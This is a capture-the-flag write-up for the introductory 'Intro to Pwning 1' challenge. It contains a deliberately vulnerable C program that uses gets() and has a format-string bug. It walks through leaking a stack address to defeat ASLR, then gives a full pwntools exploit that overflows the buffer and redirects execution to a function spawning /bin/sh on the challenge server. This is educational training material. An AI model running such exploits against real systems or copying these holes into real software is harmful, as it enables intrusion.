## Intro to Pwning 1

### Description

_**Category:** Pwn  
**Difficulty:** Baby  
**Author:** LiveOverflow_  

_This is a introductory challenge for exploiting Linux binaries with memory
corruptions. Nowodays there are quite a few mitigations that make it not as
straight forward as it used to be. So in order to introduce players to pwnable
challenges, [LiveOverflow created a video walkthrough](https://www.youtube.com/watch?v=hhu7vhmuISY)
of the first challenge. An [alternative writeup](https://static.allesctf.net/Tutorial_Intro_Pwn.html)
can also be found by 0x4d5a. More resources can also be found
[here](https://github.com/LiveOverflow/pwn_docker_example)._

Service running at: `hax1.allesctf.net:9100`

**Files:**
* [intro_pwn.zip](../intro_pwn.zip)  
  - [pwn1](../pwn1)  
	  - [Dockerfile](Dockerfile)  
    - [flag](flag)  
    - [pwn1](pwn1)  
    - [pwn1.c](pwn1.c)  
    - [ynetd](ynetd)  

**pwn1.c:**
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <string.h>

// pwn1: gcc pwn1.c -o pwn1 -fno-stack-protector

// --------------------------------------------------- SETUP

void ignore_me_init_buffering() {
	setvbuf(stdout, NULL, _IONBF, 0);
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stderr, NULL, _IONBF, 0);
}

void kill_on_timeout(int sig) {
  if (sig == SIGALRM) {
  	printf("[!] Anti DoS Signal. Patch me out for testing.");
    _exit(0);
  }
}

void ignore_me_init_signal() {
	signal(SIGALRM, kill_on_timeout);
	alarm(60);
}

// --------------------------------------------------- MENU

void WINgardium_leviosa() {
    printf("┌───────────────────────┐\n");
    printf("│ You are a Slytherin.. │\n");
    printf("└───────────────────────┘\n");
    system("/bin/sh");
}

void welcome() {
    char read_buf[0xff];
    printf("Enter your witch name:\n");
    gets(read_buf);
    printf("┌───────────────────────┐\n");
    printf("│ You are a Hufflepuff! │\n");
    printf("└───────────────────────┘\n");
    printf(read_buf);
}

void AAAAAAAA() {
    char read_buf[0xff];
    
    printf(" enter your magic spell:\n");
    gets(read_buf);
    if(strcmp(read_buf, "Expelliarmus") == 0) {
        printf("~ Protego!\n");
    } else {
        printf("-10 Points for Hufflepuff!\n");
        _exit(0);
    }
}
// --------------------------------------------------- MAIN

void main(int argc, char* argv[]) {
	ignore_me_init_buffering();
	ignore_me_init_signal();

    welcome();
    AAAAAAAA();
}



```

---

### Solution

Running `checksec` we see that we have ASLR and no stack canary:

```
$ checksec pwn1
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

```

From the source code we can see that the `main` function of `pwn1` runs the
functions `welcome()` and `AAAAAAAA()` in that order.

There is also a function `WINguardium_leviosa` that spawns a shell. This is the
function we want to redirect execution to. In `welcome()` there is
a call to `gets`, and the buffer that the input is copied to, is later given
as argument to `printf`, which provides us with a format string vulnerability,
which we can use to leak the contents of the stack.

Lets print 32 values from the stack by sending a string of 32 `%p`'s.
If we set a breakpoint right before the call to `printf` inside `welcome`, we
can analyse the stack, to see if we can leak an address and defeat the ASLR.  
First we have to check the memory map:

```
[0x55f19702c2fb]> dm
0x000055f19702b000 - 0x000055f19702c000 - usr     4K s r-- /pwd/pwn1 /pwd/pwn1 ; sym.imp.__cxa_finalize
0x000055f19702c000 - 0x000055f19702d000 * usr     4K s r-x /pwd/pwn1 /pwd/pwn1 ; map.pwd_pwn1.r_x
0x000055f19702d000 - 0x000055f19702e000 - usr     4K s r-- /pwd/pwn1 /pwd/pwn1 ; obj._IO_stdin_used
0x000055f19702e000 - 0x000055f19702f000 - usr     4K s r-- /pwd/pwn1 /pwd/pwn1 ; map.pwd_pwn1.r
0x000055f19702f000 - 0x000055f197030000 - usr     4K s rw- /pwd/pwn1 /pwd/pwn1 ; map.pwd_pwn1.rw
```

We see that the executable code starts from address `0x000055f19702c000`. Then
analyse the binary by running `aa`, disasemble `welcome` with
`pdf @ sym.welcome` set a breakpoint before the call to `printf` with
`db 0x55f19702c2fb` and continue execution with `dc`.

Now let's analyse the stack:

![images/stack.png](images/stack.png)

We see that that last address shown in the output `0x000055f19702c268` is a
reference to the code. If we continue execution we see that the last value
that we leak is `0x1`:

```
┌───────────────────────┐
│ You are a Hufflepuff! │
└───────────────────────┘
0x7f230fe44723 | (nil) | 0x7f230fd6a317 | 0x4c | (nil) | 0x207025207c207025 | 0x25207c207025207c | 0x7c207025207c2070 | 0x7025207c20702520 | 0x207c207025207c20 | 0x207025207c207025 | 0x25207c207025207c | 0x7c207025207c2070 | 0x7025207c20702520 | 0x207c207025207c20 | 0x207025207c207025 | 0x25207c207025207c | 0x7c207025207c2070 | 0x7025207c20702520 | 0x207c207025207c20 | 0x207025207c207025 | 0x25207c207025207c | 0x7c207025207c2070 | 0x7025207c20702520 | 0x8000007025207c20 | (nil) | (nil) | (nil) | (nil) | (nil) | (nil) | 0x1 enter your magic spell:
```

We need to leak 5 more values to get the code reference.
So let's send 37 `%p`'s instead.

In the next run we get the leaked address which in this case is now
`0x5608df002268`, we can find the address of `WINguardian_leviosa`:

```
[0x7f1d470a4fe6]> afl | grep WIN
0x5608df00226b    1 55           sym.WINgardium_leviosa
```

We can see the `WINguardium_leviosa` begins 3 bytes after the reference on the
stack.

Now let's use the `gets` in `AAAAAAAAA` to overwrite the return address with
the address of `WINguardium_leviosa` using the cyclic function in pwntools. Note
that we have to send "Expelliarums" followed by a null byte to reach the
correct branch of the if statement. Running the program and inspecting the stack
after the segfault, we find the offset of the de bruijn pattern to be "cnaa".
When we append the address of `WINguardium_leviosa` we end up with a final
payload of:

```
"Expelliarmus\x00" + cyclic_find("cnaa") + p64(WIN)
```

This exploit ends up misaligning the stack pointer, its address ends on 8, but
should end on 0, and gives us a segfault. We can fix this by writing the address
of a `ret` instruction before the address of `WIN`. We end up with the following
exploit:

```python 
from pwn import *

FORMAT_SPECIFIERS = "|".join(["%p" for _ in range(37)])
LEAKED_TO_WIN_OFFSET = 0x3

conn = remote("hax1.allesctf.net", 9100)
conn.recvuntil("Enter your witch name:")

conn.sendline(FORMAT_SPECIFIERS)
LEAKED_ADDR = int(conn.recvuntil("enter your magic spell:").split("|")[-1] \
        .split(" ")[0], 16)
WIN = LEAKED_ADDR + LEAKED_TO_WIN_OFFSET
#raw_input("attach to {}".format(str(conn.proc.pid)))
PADDING = "A"*cyclic_find("cnaa")
RET_TO_ALIGN_RSP = WIN - 0x1
conn.sendline("Expelliarmus\x00" + PADDING + p64(RET_TO_ALIGN_RSP) + p64(WIN))

conn.interactive()
```

Running `exploit.py`:
```
root@0b768ce01275:/pwd# python exploit.py 
[+] Opening connection to hax1.allesctf.net on port 9100: Done
[*] Switching to interactive mode

~ Protego!
┌───────────────────────┐
│ You are a Slytherin.. │
└───────────────────────┘
$ cat flag
CSCG{NOW_PRACTICE_MORE}$
```
